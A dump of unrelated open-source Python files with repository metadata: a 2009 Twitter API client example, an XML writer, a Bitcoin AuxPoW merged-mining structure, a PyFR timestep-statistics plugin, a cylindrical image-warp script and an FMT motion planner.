4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c
|
[
"BSD-3-Clause"
] | null | null | null |
examples/twitter.py
|
alex/remoteobjects
|
4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2009 Six Apart Ltd.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of Six Apart Ltd. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
A Twitter API client, implemented using remoteobjects.
"""
__version__ = '1.1'
__date__ = '17 April 2009'
__author__ = 'Brad Choate'
import httplib
from optparse import OptionParser
import sys
from urllib import urlencode, quote_plus
from urlparse import urljoin, urlunsplit
from httplib2 import Http
from remoteobjects import RemoteObject, fields, ListObject
class User(RemoteObject):
"""A Twitter account.
A User can be retrieved from ``http://twitter.com/users/show.json`` with
the appropriate ``id``, ``user_id``, or ``screen_name`` parameter.
"""
id = fields.Field()
name = fields.Field()
screen_name = fields.Field()
location = fields.Field()
description = fields.Field()
profile_image_url = fields.Field()
protected = fields.Field()
followers_count = fields.Field()
status = fields.Object('Status')
@classmethod
def get_user(cls, http=None, **kwargs):
url = '/users/show'
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class DirectMessage(RemoteObject):
"""A Twitter direct message.
The authenticated user's most recent direct messages are at
``http://twitter.com/direct_messages.json``.
"""
id = fields.Field()
sender_id = fields.Field()
text = fields.Field()
recipient_id = fields.Field()
created_at = fields.Field()
sender_screen_name = fields.Field()
recipient_screen_name = fields.Field()
sender = fields.Object(User)
recipient = fields.Object(User)
def __unicode__(self):
return u"%s: %s" % (self.sender.screen_name, self.text)
class Status(RemoteObject):
"""A Twitter update.
Statuses can be fetched from
``http://twitter.com/statuses/show/<id>.json``.
"""
created_at = fields.Field()
id = fields.Field()
text = fields.Field()
source = fields.Field()
truncated = fields.Field()
in_reply_to_status_id = fields.Field()
in_reply_to_user_id = fields.Field()
in_reply_to_screen_name = fields.Field()
favorited = fields.Field()
user = fields.Object(User)
@classmethod
def get_status(cls, id, http=None):
return cls.get(urljoin(Twitter.endpoint, "/statuses/show/%d.json" % int(id)), http=http)
def __unicode__(self):
return u"%s: %s" % (self.user.screen_name, self.text)
class DirectMessageList(ListObject):
entries = fields.List(fields.Object(DirectMessage))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def get_messages(cls, http=None, **kwargs):
url = '/direct_messages.json'
query = urlencode(filter(lambda x: x in ('since_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def get_sent_messages(cls, http=None, **kwargs):
url = '/direct_messages/sent.json'
query = urlencode(filter(lambda x: x in ('since_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class UserList(ListObject):
entries = fields.List(fields.Object(User))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def get_friends(cls, http=None, **kwargs):
return cls.get_related("friends", http=http, **kwargs)
@classmethod
def get_followers(cls, http=None, **kwargs):
return cls.get_related("followers", http=http, **kwargs)
@classmethod
def get_related(cls, relation, http=None, **kwargs):
url = '/statuses/%s' % relation
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class Timeline(ListObject):
entries = fields.List(fields.Object(Status))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def public(cls, http=None):
return cls.get(urljoin(Twitter.endpoint, '/statuses/public_timeline.json'), http=http)
@classmethod
def friends(cls, http=None, **kwargs):
query = urlencode(filter(lambda x: x in ('since_id', 'max_id', 'count', 'page'), kwargs))
url = urlunsplit((None, None, '/statuses/friends_timeline.json', query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def user(cls, http=None, **kwargs):
url = '/statuses/user_timeline'
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id', 'since_id', 'max_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def mentions(cls, http=None, **kwargs):
query = urlencode(filter(lambda x: x in ('since_id', 'max_id', 'page'), kwargs))
url = urlunsplit((None, None, '/statuses/mentions.json', query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class Twitter(Http):
"""A user agent for interacting with Twitter.
Instances of this class are full ``httplib2.Http`` HTTP user agent
objects, but provide convenient convenience methods for interacting with
Twitter and its data objects.
"""
endpoint = 'http://twitter.com/'
def public_timeline(self):
return Timeline.public(http=self)
def friends_timeline(self, **kwargs):
return Timeline.friends(http=self, **kwargs)
def user_timeline(self, **kwargs):
return Timeline.user(http=self, **kwargs)
def show(self, id):
return Status.get_status(id, http=self)
def user(self, id, **kwargs):
return User.get_user(http=self, **kwargs)
def mentions(self, **kwargs):
return Timeline.mentions(http=self, **kwargs)
def friends(self, **kwargs):
return UserList.get_friends(http=self, **kwargs)
def direct_messages_received(self, **kwargs):
return DirectMessageList.get_messages(http=self, **kwargs)
def direct_messages_sent(self, **kwargs):
        return DirectMessageList.get_sent_messages(http=self, **kwargs)
def show_public(twitter):
print "## Public timeline ##"
for tweet in twitter.public_timeline():
print unicode(tweet)
def show_dms(twitter):
print "## Direct messages sent to me ##"
for dm in twitter.direct_messages_received():
print unicode(dm)
def show_friends(twitter):
print "## Tweets from my friends ##"
for tweet in twitter.friends_timeline():
print unicode(tweet)
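# A hedged usage sketch (not part of the original script): show the
# authenticated user's own recent tweets via the user_timeline() convenience
# method, mirroring the helper functions above (requires -u, like --dms).
def show_my_tweets(twitter):
    print "## My recent tweets ##"
    for tweet in twitter.user_timeline():
        print unicode(tweet)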
def main(argv=None):
if argv is None:
argv = sys.argv
parser = OptionParser()
parser.add_option("-u", "--username", dest="username",
help="name of user for authentication")
parser.add_option("--public", action="store_const", const=show_public,
dest="action", default=show_public,
help="Show tweets from the public timeline")
parser.add_option("--dms", action="store_const", const=show_dms,
dest="action", help="Show DMs sent to you (requires -u)")
parser.add_option("--friends", action="store_const", const=show_friends,
dest="action", help="Show your friends' recent tweets (requires -u)")
opts, args = parser.parse_args()
twitter = Twitter()
# We'll use regular HTTP authentication, so ask for a password and add
# it in the regular httplib2 way.
if opts.username is not None:
password = raw_input("Password (will echo): ")
twitter.add_credentials(opts.username, password)
try:
print
opts.action(twitter)
print
except httplib.HTTPException, exc:
# The API could be down, or the credentials on an auth-only request
# could be wrong, so show the error to the end user.
print >>sys.stderr, "Error making request: %s: %s" \
% (type(exc).__name__, str(exc))
return 1
return 0
if __name__ == '__main__':
sys.exit(main())
| 32.059748
| 114
| 0.665326
| 6,400
| 0.627759
| 0
| 0
| 3,064
| 0.300539
| 0
| 0
| 3,495
| 0.342815
|
62a5341859cb97bf208e99d03085417e4406b355
| 1,119
|
py
|
Python
|
droxi/drox/write.py
|
andydude/droxtools
|
d608ceb715908fb00398c0d28eee74286fef3750
|
[
"MIT"
] | null | null | null |
droxi/drox/write.py
|
andydude/droxtools
|
d608ceb715908fb00398c0d28eee74286fef3750
|
[
"MIT"
] | null | null | null |
droxi/drox/write.py
|
andydude/droxtools
|
d608ceb715908fb00398c0d28eee74286fef3750
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# droxi
# Copyright (c) 2014, Andrew Robbins, All rights reserved.
#
# This library ("it") is free software; it is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; you can redistribute it and/or modify it under the terms of the
# GNU Lesser General Public License ("LGPLv3") <https://www.gnu.org/licenses/lgpl.html>.
from __future__ import absolute_import
import sys
import importlib
from .etree import etree
from .config import DEBUG
def drox_write(exp, fp=sys.stdout):
fp.write(drox_write_string(exp) + '\n')
def drox_write_tree(exp):
if DEBUG: print("write <= " + repr(exp))
if hasattr(exp, '__tree__'):
tree = exp.__tree__()
else:
name = '.'.join(type(exp).__module__.split('.')[:2])
modulename = name + '.writer'
#print("modulename = " + modulename)
lib = importlib.import_module(modulename)
tree = lib.Writer()(exp)
if DEBUG: print("write => " + repr(tree))
return tree
def drox_write_string(exp):
tree = drox_write_tree(exp)
return etree.tostring(tree)
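# A minimal usage sketch (not part of the original module), assuming the
# local .etree wrapper is ElementTree-compatible: an object that provides
# __tree__ is serialized directly by drox_write().
class _ExampleExp(object):
    def __tree__(self):
        node = etree.Element("example")
        node.text = "hello"
        return node
# drox_write(_ExampleExp())  # would print: <example>hello</example>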
| 31.971429
| 93
| 0.669348
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 471
| 0.420912
|
62a6aa5f52b205b9fb58d93a1dc26a90e2c69fff
| 5,224
|
py
|
Python
|
hathor/transaction/aux_pow.py
|
mbnunes/hathor-core
|
e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8
|
[
"Apache-2.0"
] | 51
|
2019-12-28T03:33:27.000Z
|
2022-03-10T14:03:03.000Z
|
hathor/transaction/aux_pow.py
|
mbnunes/hathor-core
|
e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8
|
[
"Apache-2.0"
] | 316
|
2019-09-10T09:20:05.000Z
|
2022-03-31T20:18:56.000Z
|
hathor/transaction/aux_pow.py
|
jansegre/hathor-core
|
22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd
|
[
"Apache-2.0"
] | 19
|
2020-01-04T00:13:18.000Z
|
2022-02-08T21:18:46.000Z
|
# Copyright 2021 Hathor Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, NamedTuple
from structlog import get_logger
from hathor import protos
logger = get_logger()
class BitcoinAuxPow(NamedTuple):
header_head: bytes # 36 bytes
coinbase_head: bytes # variable length (at least 47 bytes)
coinbase_tail: bytes # variable length (at least 18 bytes)
merkle_path: List[bytes] # each element has 32 bytes
header_tail: bytes # 12 bytes
@classmethod
def dummy(cls) -> 'BitcoinAuxPow':
""" Create a minimal valid AuxPOW.
"""
from hathor.merged_mining import MAGIC_NUMBER
return cls(b'\0' * 36, MAGIC_NUMBER, b'', [b'\0' * 32], b'\0' * 12)
def calculate_hash(self, base_block_hash: bytes) -> bytes:
""" Hash of the Bitcoin produced header, this is used for the block hash.
"""
from hathor.merged_mining.bitcoin import build_merkle_root_from_path, sha256d_hash
coinbase_tx_hash = sha256d_hash(self.coinbase_head + base_block_hash + self.coinbase_tail)
merkle_root = bytes(reversed(build_merkle_root_from_path([coinbase_tx_hash] + self.merkle_path)))
return sha256d_hash(self.header_head + merkle_root + self.header_tail)
def verify(self, _base_block_hash: bytes) -> None:
""" Check for inconsistencies, raises instance of TxValidationError on error.
"""
from hathor.merged_mining import MAGIC_NUMBER
from hathor.transaction.exceptions import AuxPowError
if not self.coinbase_head.endswith(MAGIC_NUMBER):
raise AuxPowError('cannot find MAGIC_NUMBER')
if MAGIC_NUMBER in self.coinbase_head[42:len(MAGIC_NUMBER)]: # 42 first bytes can be ignored
raise AuxPowError('multiple instances of MAGIC_NUMBER')
if len(self.merkle_path) > 12:
raise AuxPowError('`merkle_path` too long')
# XXX: is there anything else that needs to be verified?
def to_proto(self) -> protos.BitcoinAuxPow:
""" Create Protobuf instance, all values are copied.
"""
return protos.BitcoinAuxPow(
header_head=self.header_head,
coinbase_head=self.coinbase_head,
coinbase_tail=self.coinbase_tail,
merkle_path=self.merkle_path,
header_tail=self.header_tail,
)
@classmethod
def create_from_proto(cls, aux_pow_proto: protos.BitcoinAuxPow) -> 'BitcoinAuxPow':
""" Create a BitcionAuxPow instance from Protobuf.
"""
return cls(
header_head=aux_pow_proto.header_head,
coinbase_head=aux_pow_proto.coinbase_head,
coinbase_tail=aux_pow_proto.coinbase_tail,
merkle_path=list(aux_pow_proto.merkle_path),
header_tail=aux_pow_proto.header_tail,
)
def __bytes__(self) -> bytes:
""" Convert to byte representation.
| Size | Description | Comments |
|------|----------------------|----------|
| 36 | `header_head` | first 36 bytes of the header |
| 1+ | `coinbase_head` size | byte length of the next field |
| 47+ | `coinbase_head` | coinbase bytes before hash of `block_data` |
| 1+ | `coinbase_tail` size | byte length of the next field |
| 18+ | `coinbase_tail` | coinbase bytes after hash of `block_data` |
| 1+ | `merkle_path` count | the number of links on the `merkle_path` |
| 32+ | `merkle_path` | array of links, each one is 32 bytes long |
| 12 | `header_tail` | last 12 bytes of the header |
"""
from hathor.merged_mining.bitcoin import encode_bytearray, encode_list
struct_bytes = self.header_head
struct_bytes += encode_bytearray(self.coinbase_head)
struct_bytes += encode_bytearray(self.coinbase_tail)
struct_bytes += encode_list(self.merkle_path)
struct_bytes += self.header_tail
return struct_bytes
@classmethod
def from_bytes(cls, b: bytes) -> 'BitcoinAuxPow':
""" Convert bytes to class instance.
"""
from hathor.merged_mining.bitcoin import read_bytes, read_nbytes, read_varint
a = bytearray(b)
header_head = read_nbytes(a, 36)
coinbase_head = read_bytes(a)
coinbase_tail = read_bytes(a)
c = read_varint(a)
merkle_path = []
for _ in range(c):
merkle_path.append(bytes(a[:32]))
del a[:32]
header_tail = read_nbytes(a, 12)
return cls(
header_head,
coinbase_head,
coinbase_tail,
merkle_path,
header_tail,
)
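    def _roundtrip_sketch(self) -> None:
        """ A hedged usage sketch (not part of the original class): __bytes__()
        and from_bytes() are intended to round-trip, so a dummy AuxPOW should
        survive serialization unchanged.
        """
        aux_pow = BitcoinAuxPow.dummy()
        assert BitcoinAuxPow.from_bytes(bytes(aux_pow)) == aux_pow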
| 41.460317
| 105
| 0.647205
| 4,526
| 0.866386
| 0
| 0
| 1,405
| 0.268951
| 0
| 0
| 2,083
| 0.398737
|
62a6cdcc5cf9bca5a11b6dc4e9f38e91015abe52
| 502
|
py
|
Python
|
cortex/export/__init__.py
|
mvdoc/pycortex
|
bc8a93cac9518e3c1cd89650c703f9f3814e805b
|
[
"BSD-2-Clause"
] | 423
|
2015-01-06T02:46:46.000Z
|
2022-03-23T17:20:38.000Z
|
cortex/export/__init__.py
|
mvdoc/pycortex
|
bc8a93cac9518e3c1cd89650c703f9f3814e805b
|
[
"BSD-2-Clause"
] | 243
|
2015-01-03T02:10:03.000Z
|
2022-03-31T19:29:48.000Z
|
cortex/export/__init__.py
|
mvdoc/pycortex
|
bc8a93cac9518e3c1cd89650c703f9f3814e805b
|
[
"BSD-2-Clause"
] | 136
|
2015-03-23T20:35:59.000Z
|
2022-03-09T13:39:10.000Z
|
from .save_views import save_3d_views
from .panels import plot_panels
from ._default_params import (
params_inflatedless_lateral_medial_ventral,
params_flatmap_lateral_medial,
params_occipital_triple_view,
params_inflated_dorsal_lateral_medial_ventral,
)
__all__ = [
"save_3d_views",
"plot_panels",
"params_flatmap_lateral_medial",
"params_occipital_triple_view",
"params_inflatedless_lateral_medial_ventral",
"params_inflated_dorsal_lateral_medial_ventral",
]
| 27.888889
| 52
| 0.804781
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 180
| 0.358566
|
62a72c2067d3b5d382112ffdbd4e31435a1725b9
| 1,456
|
py
|
Python
|
pyfr/plugins/dtstats.py
|
DengSonic/PyFR
|
dde524ed56f4a4feca376b51db4b21eb6fa4b113
|
[
"BSD-3-Clause"
] | 1
|
2020-06-23T16:37:06.000Z
|
2020-06-23T16:37:06.000Z
|
pyfr/plugins/dtstats.py
|
synthetik-technologies/PyFR
|
9d4d5e96a8a9d5ca47970ec197b251ae8b0ecdda
|
[
"BSD-3-Clause"
] | null | null | null |
pyfr/plugins/dtstats.py
|
synthetik-technologies/PyFR
|
9d4d5e96a8a9d5ca47970ec197b251ae8b0ecdda
|
[
"BSD-3-Clause"
] | 1
|
2020-08-21T02:50:17.000Z
|
2020-08-21T02:50:17.000Z
|
# -*- coding: utf-8 -*-
from pyfr.mpiutil import get_comm_rank_root
from pyfr.plugins.base import BasePlugin, init_csv
class DtStatsPlugin(BasePlugin):
name = 'dtstats'
systems = ['*']
formulations = ['std']
def __init__(self, intg, cfgsect, prefix):
super().__init__(intg, cfgsect, prefix)
self.flushsteps = self.cfg.getint(self.cfgsect, 'flushsteps', 500)
self.count = 0
self.stats = []
self.tprev = intg.tcurr
# MPI info
comm, rank, root = get_comm_rank_root()
# The root rank needs to open the output file
if rank == root:
self.outf = init_csv(self.cfg, cfgsect, 'n,t,dt,action,error')
else:
self.outf = None
def __call__(self, intg):
# Process the sequence of rejected/accepted steps
for i, (dt, act, err) in enumerate(intg.stepinfo, start=self.count):
self.stats.append((i, self.tprev, dt, act, err))
# Update the total step count and save the current time
self.count += len(intg.stepinfo)
self.tprev = intg.tcurr
# If we're the root rank then output
if self.outf:
for s in self.stats:
print(','.join(str(c) for c in s), file=self.outf)
# Periodically flush to disk
if intg.nacptsteps % self.flushsteps == 0:
self.outf.flush()
# Reset the stats
self.stats = []
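# A hedged configuration sketch (not part of the original module). The only
# option read explicitly above is 'flushsteps'; the section name below is an
# assumption based on the plugin name, not taken from this file:
#
#   [soln-plugin-dtstats]
#   flushsteps = 500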
| 29.12
| 76
| 0.581731
| 1,333
| 0.915522
| 0
| 0
| 0
| 0
| 0
| 0
| 316
| 0.217033
|
62a840352bdaa921e3b37484cc7f2c625c055007
| 1,989
|
py
|
Python
|
scripts/cylindrical.py
|
NunchakusLei/Panoramas-with-image-stitching
|
a0c9a292d53f22e4de82fe337935c946064fe519
|
[
"Apache-2.0"
] | 3
|
2020-12-24T19:02:19.000Z
|
2021-07-17T07:48:54.000Z
|
scripts/cylindrical.py
|
NunchakusLei/Panoramas-with-image-stitching
|
a0c9a292d53f22e4de82fe337935c946064fe519
|
[
"Apache-2.0"
] | null | null | null |
scripts/cylindrical.py
|
NunchakusLei/Panoramas-with-image-stitching
|
a0c9a292d53f22e4de82fe337935c946064fe519
|
[
"Apache-2.0"
] | null | null | null |
# The source of this script is from:
# https://github.com/TejasNaikk/Image-Alignment-and-Panoramas/blob/master/main.py
import cv2
import numpy as np
import math
import matplotlib.pyplot as plt  # needed for the savefig=True branch below
'''
Warp an image from cartesian coordinates (x, y) into cylindrical coordinates (theta, h)
Returns: (image, mask)
Mask is [0,255], and has 255s wherever the cylindrical images has a valid value.
Masks are useful for stitching
Usage example:
im = cv2.imread("myimage.jpg",0) #grayscale
h,w = im.shape
f = 700
K = np.array([[f, 0, w/2], [0, f, h/2], [0, 0, 1]]) # mock calibration matrix
imcyl = cylindricalWarpImage(im, K)
'''
def cylindricalWarpImage(img1, K, savefig=False):
f = K[0,0]
im_h,im_w = img1.shape[:2]
# go inverse from cylindrical coord to the image
# (this way there are no gaps)
cyl = np.zeros_like(img1)
cyl_mask = np.zeros((im_h,im_w), dtype=img1.dtype)
cyl_h, cyl_w = cyl.shape[:2]
x_c = float(cyl_w) / 2.0
y_c = float(cyl_h) / 2.0
for x_cyl in np.arange(0,cyl_w):
for y_cyl in np.arange(0,cyl_h):
theta = (x_cyl - x_c) / f
h = (y_cyl - y_c) / f
X = np.array([math.sin(theta), h, math.cos(theta)])
X = np.dot(K,X)
x_im = X[0] / X[2]
if x_im < 0 or x_im >= im_w:
continue
y_im = X[1] / X[2]
if y_im < 0 or y_im >= im_h:
continue
cyl[int(y_cyl),int(x_cyl)] = img1[int(y_im),int(x_im)]
cyl_mask[int(y_cyl),int(x_cyl)] = 255
if savefig:
plt.imshow(cyl, cmap='gray')
plt.savefig("cyl.png",bbox_inches='tight')
return (cyl, cyl_mask)
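# A small helper sketch (not part of the original script): derive the focal
# length in pixels from an assumed horizontal field of view, instead of the
# mock value f = 700 used below.
def focal_from_hfov(image_width, hfov_degrees):
    # Pinhole model: f = (w / 2) / tan(hfov / 2)
    return (image_width / 2.0) / math.tan(math.radians(hfov_degrees) / 2.0)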
if __name__ == "__main__":
im = cv2.imread('../data/example-data/flower/1.jpg')
h,w = im.shape[:2]
f = 700
K = np.array([[f, 0, w/2], [0, f, h/2], [0, 0, 1]]) # mock calibration matrix
imcyl = cylindricalWarpImage(im, K)
cv2.imshow("test", imcyl[0])
cv2.waitKey()
cv2.destroyAllWindows()
| 29.25
| 87
| 0.581699
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 739
| 0.371543
|
62a90788c7716583df977b2015db0ceb313c24a8
| 7,490
|
py
|
Python
|
fmt/pythonfmt/fmt.py
|
KarlRong/Safe-RL-for-Driving
|
67484911ca8ad9f1476e96043c379c01cd5ced8c
|
[
"Apache-2.0"
] | null | null | null |
fmt/pythonfmt/fmt.py
|
KarlRong/Safe-RL-for-Driving
|
67484911ca8ad9f1476e96043c379c01cd5ced8c
|
[
"Apache-2.0"
] | null | null | null |
fmt/pythonfmt/fmt.py
|
KarlRong/Safe-RL-for-Driving
|
67484911ca8ad9f1476e96043c379c01cd5ced8c
|
[
"Apache-2.0"
] | null | null | null |
import math
import random
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from fmt.pythonfmt.doubleintegrator import filter_reachable, gen_trajectory, show_trajectory
from fmt.pythonfmt.world import World
def dist2(p, q):
    # Euclidean distance between the xy positions of two states
    # (indices shifted from the 1-based Julia original to 0-based Python).
    return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)
# FMTree class
class FMTree:
# s_init::Vec4f
# s_goal::Vec4f
# N #number of samples
# Pset::Vector{Vec4f} # Point set
# cost::Vector{Float64} #cost
# time::Vector{Float64} #optimal time to connect one node to its parent node
# parent::Vector{Int64} #parent node
# bool_unvisit::BitVector #logical value for Vunvisit
# bool_open::BitVector #logical value for Open
# bool_closed::BitVector #logical value for Closed
# world::World # simulation world config
# itr::Int64 # iteration num
def __init__(self, s_init, s_goal, N, world):
        # constructor: sample valid points from the configuration space
print("initializing fmt ...")
self.s_init = s_init
self.s_goal = s_goal
self.N = N
self.world = world
self.Pset = np.zeros((N, 4))
self.Pset[0, :] = np.array(s_init)
def myrn(min, max):
return min + (max - min) * random.random()
        # Sample N points
n = 1
while True:
num_ran = 2*N
rp = np.empty((4, num_ran))
rp[0, :] = np.random.default_rng().uniform(self.world.x_min[0], self.world.x_max[0], num_ran)
rp[1, :] = np.random.default_rng().uniform(self.world.x_min[1], self.world.x_max[1], num_ran)
rp[2, :] = np.random.default_rng().uniform(self.world.v_min[0], self.world.v_max[0], num_ran)
rp[3, :] = np.random.default_rng().uniform(self.world.v_min[1], self.world.v_max[1], num_ran)
# p = np.array([myrn(world.x_min[0], world.x_max[0]),
# myrn(world.x_min[1], world.x_max[1]),
# myrn(world.v_min[0], world.v_max[0]),
# myrn(world.v_min[1], world.v_max[1])])
for i_rp in range(0, num_ran):
if self.world.isValid(rp[:, i_rp]):
self.Pset[n, :] = rp[:, i_rp]
n = n + 1
if n == N-1:
break
if n == N-1:
break
        self.Pset[-1, :] = np.array(s_goal)  # implies idx_goal = N (last); changed so the last sample is the goal
self.cost = np.zeros(N)
self.time = np.zeros(N)
self.parent = np.zeros(N, dtype=int)
self.bool_unvisit = np.ones(N, dtype=np.bool_)
self.bool_unvisit[0] = False
self.bool_closed = np.zeros(N, dtype=np.bool_)
self.bool_open = np.zeros(N, dtype=np.bool_)
self.bool_open[0] = True
self.itr = 0
print("finish initializing")
# new(s_init, s_goal,
# N, Pset, cost, time, parent, bool_unvisit, bool_open, bool_closed, world, 0)
def show(self, ax):
print("drawing...")
        # Draw the obstacles first
N = len(self.Pset)
mat = np.zeros((2, N))
for idx in range(0, N):
mat[:, idx] = self.Pset[idx, 0:2]
idxset_open = np.nonzero(self.bool_open)[0]
idxset_closed = np.nonzero(self.bool_closed)[0]
idxset_unvisit = np.nonzero(self.bool_unvisit)[0]
# idxset_tree = setdiff(union(idxset_open, idxset_closed), [1])
        idxset_tree = np.concatenate((idxset_closed, idxset_open))  # unlike the original, id 1 is not removed here
        # start, goal, open, closed
ax.scatter(mat[0, 0], mat[1, 0], c='blue', s=20, zorder=100)
ax.scatter(mat[0, -1], mat[1, -1], c='blue', s=20, zorder=101)
ax.scatter(mat[0, idxset_open], mat[1, idxset_open], c='orange', s=5)
ax.scatter(mat[0, idxset_closed], mat[1, idxset_closed], c='red', s=5)
# ax.scatter(mat[0, idxset_unvisit], mat[1, idxset_unvisit], c='khaki', s=2)
for idx in idxset_tree:
s0 = self.Pset[self.parent[idx]]
s1 = self.Pset[idx]
tau = self.time[idx]
show_trajectory(s0, s1, tau, N_split=5, ax=ax)
        # start and goal were drawn a second time?
# ax.scatter(mat[0, 1], mat[1, 1], c='blue', s=20, zorder=100)
# ax.scatter(mat[0, -1], mat[1, -1], c='blue', s=20, zorder=101)
# plt.xlim(this.world.x_min[1]-0.05, this.world.x_max[1]+0.05)
# plt.ylim(this.world.x_min[2]-0.05, this.world.x_max[2]+0.05)
print("finish drawing")
def solve(self, ax=None, show=False, save=False):
        # keep extending nodes until the tree reaches the goal
print("please set with_savefig=false if you want to measure the computation time")
print("start solving")
while True:
if not self.extend(): # 擴展失敗
break
# if ((self.itr < 100) and (self.itr % 20 == 1)) or (self.itr % 200 == 1):
if self.itr % 40 == 1:
print("itr: ", self.itr)
if ax and show:
# close()
self.show(ax)
plt.pause(1)
if ax and save:
plt.savefig("./fig/" + str(self.itr) + ".png")
                    # this should instead be handled by passing the figure object through
if not self.bool_unvisit[-1]:
break
        # handling the case where the tree never reaches the goal is still TODO
idx = -1
idx_solution = [idx]
while True:
idx = self.parent[idx]
idx_solution.append(idx)
if idx == 0:
break
print("finish solving")
return np.array(idx_solution)
def extend(self):
# extend node
self.itr += 1
        r = 1.0  # what is this parameter?
        # the data structures here could be optimized; idxset_open and idxset_unvisit need not be rebuilt every call
        idxset_open = np.nonzero(self.bool_open)[0]  # np.nonzero returns a tuple, so take the first element
        if idxset_open.size == 0:  # no open nodes left to extend from
return False
idxset_unvisit = np.nonzero(self.bool_unvisit)[0]
idx_lowest = idxset_open[np.argmin(self.cost[idxset_open])]
# idx_lowest = idxset_open[findmin(this.cost[idxset_open])[2]]
s_c = self.Pset[idx_lowest, :]
idxset_near, _, _ = filter_reachable(self.Pset, idxset_unvisit,
self.Pset[idx_lowest], r, "F")
for idx_near in idxset_near:
idxset_cand, distset_cand, timeset_cand = filter_reachable(self.Pset, idxset_open,
self.Pset[idx_near], r, "B")
if len(idxset_cand) == 0:
return
idx_costmin = np.argmin(self.cost[idxset_cand] + distset_cand)
cost_new = self.cost[idxset_cand[idx_costmin]] + distset_cand[idx_costmin]
# cost_new, idx_costmin = findmin(this.cost[idxset_cand] + distset_cand)
# optimal time for new connection
time_new = timeset_cand[idx_costmin]
idx_parent = idxset_cand[idx_costmin]
waypoints = gen_trajectory(self.Pset[idx_parent], self.Pset[idx_near], time_new, 10)
if self.world.isValid(waypoints):
self.bool_unvisit[idx_near] = False
self.bool_open[idx_near] = True
self.cost[idx_near] = cost_new
self.time[idx_near] = time_new
self.parent[idx_near] = idx_parent
# print("nonzero cost idx: ", np.nonzero(self.cost))
self.bool_open[idx_lowest] = False
self.bool_closed[idx_lowest] = True
return True
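# A hedged helper sketch (not part of the original module): solve() returns
# indices from the goal back to the start, so reversing and indexing Pset
# gives the [x, y, vx, vy] states along the planned path.
def solution_states(tree, idx_solution):
    return tree.Pset[np.asarray(idx_solution)[::-1]]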
| 40.486486
| 105
| 0.554072
| 7,392
| 0.956769
| 0
| 0
| 0
| 0
| 0
| 0
| 2,284
| 0.295625
|
62aaf966c075e395977fecf28d9050755afb7dda
| 2,338
|
py
|
Python
|
algorithms/edit_distance.py
|
costincaraivan/cs-refresher
|
008fdb2af661310c65f656f017ec34e5df004424
|
[
"MIT"
] | 1
|
2018-06-12T12:00:33.000Z
|
2018-06-12T12:00:33.000Z
|
algorithms/edit_distance.py
|
costincaraivan/cs-refresher
|
